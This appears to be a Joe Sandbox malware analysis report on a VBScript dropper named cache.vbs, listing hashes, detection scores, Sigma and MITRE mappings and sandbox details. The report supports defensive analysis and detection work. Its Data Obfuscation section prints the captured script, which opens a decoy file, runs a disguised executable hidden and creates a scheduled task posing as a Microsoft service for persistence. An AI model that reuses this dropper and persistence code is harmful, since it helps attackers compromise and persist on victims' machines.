
Windows Analysis Report
cache.vbs

Overview

General Information

Sample name: cache.vbs
Analysis ID: 1528871
MD5: 7e98bb7ffba4cf12d29132a2c71973eb
SHA1: 891b5908cee1908d62429ac2515beb8c1f7e63f2
SHA256: da0ae773603dc68d9bae4713afd8dbf89b1db5f891057b636380fa123a68c550
Tags: vbs, user-JAMESWT_MHT

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 5260 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", ProcessId: 5260, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", ProcessId: 5260, ProcessName: wscript.exe
No Suricata rule has matched


AV Detection

Source: cache.vbs; ReversingLabs: Detection: 28%
Source: cache.vbs; Virustotal: Detection: 30%

System Summary

Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: cache.vbs; Initial sample: Strings found which are bigger than 50
Source: classification engine; Classification label: mal64.evad.winVBS@1/0@0/0
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs"
Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cache.vbs; ReversingLabs: Detection: 28%
Source: cache.vbs; Virustotal: Detection: 30%
Source: C:\Windows\System32\wscript.exe; Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe; Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe; Anti Malware Scan Interface (script buffer as captured; the report truncates it mid-statement):

    WScript.CreateObject("Scripting.FileSystemObject")
    Dim currentPath
    currentPath = objFSO.GetAbsolutePathName(".")
    strFilePath = currentPath & "\_cache\cache\cache.bak"
    strNewFilePath = currentPath & "\_cache\cache\sigverif.exe"
    objFSO.MoveFile strFilePath, strNewFilePath
    Set objFSO = Nothing
    Dim filenameb64
    filenameb64 = DecodeBase64("5Y2a5aOr5ZCO55Sz6K+3LeeOi+eOieeOui3ljY7kuK3np5HmioDlpKflraYt55S15rCU5LiO55S15a2Q5bel56iL5Y2a5aOrLeeugOWOhi5wZGY=")
    Dim fso
    Set fso = WScript.CreateObject("Scripting.FileSystemObject")
    Dim sourcePath,destinationPath,runfile,runfile2
    sourcePath = currentPath & "\_cache\cache\" & "cache.db"
    destinationPath = currentPath & "\" & filenameb64
    deleteFile = currentPath & "\" & filenameb64 & ".lnk"
    runfile = Chr(34) & currentPath & "\_cache\cache\sigverif.exe" & Chr(34)
    runfile2 = currentPath & "\_cache\cache\sigverif.exe"
    fso.MoveFile sourcePath, destinationPath
    fso.DeleteFile deleteFile
    Dim tempFolder, tempPath
    tempFolder = fso.GetSpecialFolder(2)
    tempPath = tempFolder & "\sigverif.exe"
    fso.CopyFile runfile2, tempPath, True
    Dim v1
    v1 = Chr(34) & destinationPath & Chr(34)
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run v1, 0, False
    WshShell.Run tempPath, 0, False
    fso.DeleteFile runfile2
    Set WshShell = Nothing
    Dim shellPath
    Dim taskName
    shellPath = tempPath
    taskName = "WpnUserService_x64"
    Const TriggerTypeDaily = 1
    Const ActionTypeExec = 0
    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    Dim rootFolder
    Set rootFolder = service.GetFolder("\")
    Dim taskDefinition
    Set taskDefinition = service.NewTask(0)
    Dim regInfo
    Set regInfo = taskDefinition.RegistrationInfo
    regInfo.Description = "Update"
    regInfo.Author = "Microsoft"
    Dim settings
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.StartWhenAvailable = True
    settings.Hidden = False
    settings.DisallowStartIfOnBatteries = False
    Dim triggers
    Set triggers = taskDefinition.triggers
    Dim trigger
    On Error Resume Next
    CreateObject("WScript.Shell").RegRead ("HKEY_USERS\S-1-5-19\Environment\TEMP")
    If Err.Number = 0 Then
        IsAdmin = True
        Set trigger = triggers.Create(8)
        Set trigger = triggers.Create(9)
    Else
        IsAdmin = False
    End If
    Err.Clear
    On Error GoTo 0
    Set trigger = triggers.Create(7)
    Set trigger = triggers.Create(6)
    Set trigger = triggers.Create(TriggerTypeDaily)
    Dim startTime, endTime
    Dim time
    time = DateAdd("n", 2, Now)
    Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
    Dim tTime, tDate
    cSecond = "0" & Second(time)
    cMinute = "0" & Minute(time)
    CHour = "0" & Hour(time)
    cDay = "0" & Day(time)
    cMonth = "0" & Month(time)
    cYear = Year(time)
    tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & ":" & Right(cSecond, 2)
    tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
    startTime = tDate & "T" & tTime
    endTime = "2099-05-02T10:52:02"
    trigger.StartBoundary = startTime
    trigger.EndBoundary = endTime
    trigger.ID = "TimeTriggerId"
    trigger.Enabled = True
    Dim repetitionPattern
    Set repetitionPattern = trigger.Repetition
    repeti
Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
Source: all processes; Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (tactic columns): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact

Gather Victim Identity Information | 121 Scripting | Valid Accounts | Windows Management Instrumentation | 121 Scripting | 1 DLL Side-Loading | 1 DLL Side-Loading | OS Credential Dumping | 2 System Information Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | Boot or Logon Initialization Scripts | 1 Obfuscated Files or Information | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Source | Detection | Scanner | Label
cache.vbs | 29% | ReversingLabs | Script-WScript.Packed.Generic
cache.vbs | 31% | Virustotal | 
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528871
Start date and time: 2024-10-08 11:01:17 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cache.vbs
Detection: MAL
Classification: mal64.evad.winVBS@1/0@0/0
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .vbs
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information
No simulations
No context
No created / dropped files found
File type: data
Entropy (8bit): 5.632358798821212
TrID:
  • Visual Basic Script (13500/0) 100.00%
File name: cache.vbs
File size: 7'660 bytes
MD5: 7e98bb7ffba4cf12d29132a2c71973eb
SHA1: 891b5908cee1908d62429ac2515beb8c1f7e63f2
SHA256: da0ae773603dc68d9bae4713afd8dbf89b1db5f891057b636380fa123a68c550
SHA512: d7589cfb3a8d7bbedee520663ba536b72cef5c35279efe15deec052af4627e618dc831f94ccc256eb41dd5248d94bef993bfb638d0b49f109ce2031b2c25c575
SSDEEP: 192:v0nGM+8Nngp99wdFs2Ip6bNSaTKp6hGuz22vc/4KW:v61NgpY+6bNSaTKpIGuz22vx
TLSH: 0DF1E596BB29B5DDA0E2C1A3F42F4ED9F411A1B304A5A91370DEF6600FF01C6358349A
File Content Preview: Const msiOpenDatabaseModeReadOnly = 0....' Show help if no arguments or if argument contains ?..Dim argCount : argCount = Wscript.Arguments.Count..If argCount > 0 Then If InStr(1, Wscript.Arguments(0), "?", vbTextCompare) > 0 Then argCount = 0..If argCoun
Icon Hash: 68d69b8f86ab9a86
No network behavior found


Target ID: 0
Start time: 05:02:09
Start date: 08/10/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs"
Imagebase: 0x7ff60d4a0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

No disassembly